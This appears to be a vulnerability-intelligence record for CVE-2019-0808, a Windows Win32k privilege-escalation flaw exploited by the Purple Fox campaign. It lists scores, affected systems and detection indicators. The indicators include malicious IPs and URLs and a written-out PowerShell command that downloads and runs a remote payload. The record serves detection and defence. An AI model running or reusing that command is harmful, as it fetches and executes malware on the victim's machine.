CVE-2019-0808
published 2019-04-09

Priority: P1 · 84 · high
CVSS 3.1: 7.8 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability (due 2022-05-03)
Exploited in the wild
EPSS: 53.30% (98.9th percentile)
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0797.

Affected

19 ranges (the version-range and fixed-in columns were not captured in this extract)

Vendor     Product
microsoft  windows (2 ranges)
microsoft  windows_server (8 ranges)
microsoft  windows_server_2008
microsoft  windows_server_2012
msrc       windows_7_for_32-bit_systems_service_pack_1
msrc       windows_7_for_x64-based_systems_service_pack_1
msrc       windows_server_2008_for_32-bit_systems_service_pack_2
msrc       windows_server_2008_for_itanium-based_systems_service_pack_2
msrc       windows_server_2008_for_x64-based_systems_service_pack_2
msrc       windows_server_2008_r2_for_itanium-based_systems_service_pack_1
msrc       windows_server_2008_r2_for_x64-based_systems_service_pack_1

Detection & IOCs (extracted from sources)

hash:      82af45d8c057ef0cf1a61cc43290d21f37838dd1
hash:      6cac8138f1e7e64884494eff2b01c7b1df83aef2
hash:      e65c1a74275e7099347cbec3f9969f783d6f4f7d
filename:  cve_2019_0808.exe
filename:  cve_2019_0808.ps1
url:       http://rawcdn.githack.cyou/up.php?key=1
domain:    speedjudgmentacceleration.com
url:       http://103.228.112.246:17881/57BC9B7E.Png
url:       http://103.228.112.246:17881/0CFA042F.Png
ip:        103.228.112.246
ip:        117.187.136.141
registry:  HKLM\SYSTEM\CurrentControlSet\Services\{ac00-ac10}
path:      C:\Windows\AppPatch\Acpsens.dll
filename:  dbcode21mk.log
filename:  setupact64.log
command:   cmd.exe /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxp://103.228.112.246:17881/57BC9B7E.Png');MsiMake hxxp://103.228.112.246:17881/0CFA042F.Png"
  • CVE-2019-0808 exploit binary compiled on 10 September 2020; PDB path reveals it was sourced from a public GitHub repository named CVE-2019-0808
  • CVE-2019-0808 is targeted specifically against Windows 7 / Windows Server 2008 systems missing KB4489878, KB4489885, or KB2882822; check for absence of these hotfixes as a detection signal
  • Purple Fox payload uses steganography to embed LPE exploit binaries inside image files (key=3 & key=4); detect by inspecting pixel-level LSB encoding in downloaded images combined with IEX execution
  • Purple Fox MSI drops a VMProtect-protected DLL; PE section names starting with '.vmp' indicate VMProtect packing and should be flagged during file scanning
  • CVE-2019-0808 exploitation in the PurpleFox context targets only Windows 7 / Windows Server 2008 (64-bit); the exploit bundle script checks the OS version before selecting this CVE
  • The exploit code for CVE-2019-0808 used by Purple Fox was sourced from a publicly available GitHub repository, meaning the binary may vary across actors who recompile it

CVSS provenance

Source       Version  Score  Severity  Vector
nvd          v3.1     7.8    HIGH      CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd          v2.0     7.2    HIGH      AV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck    -        7.8    HIGH
cisa         -        7.8    HIGH
vendor_msrc  -        7.0    HIGH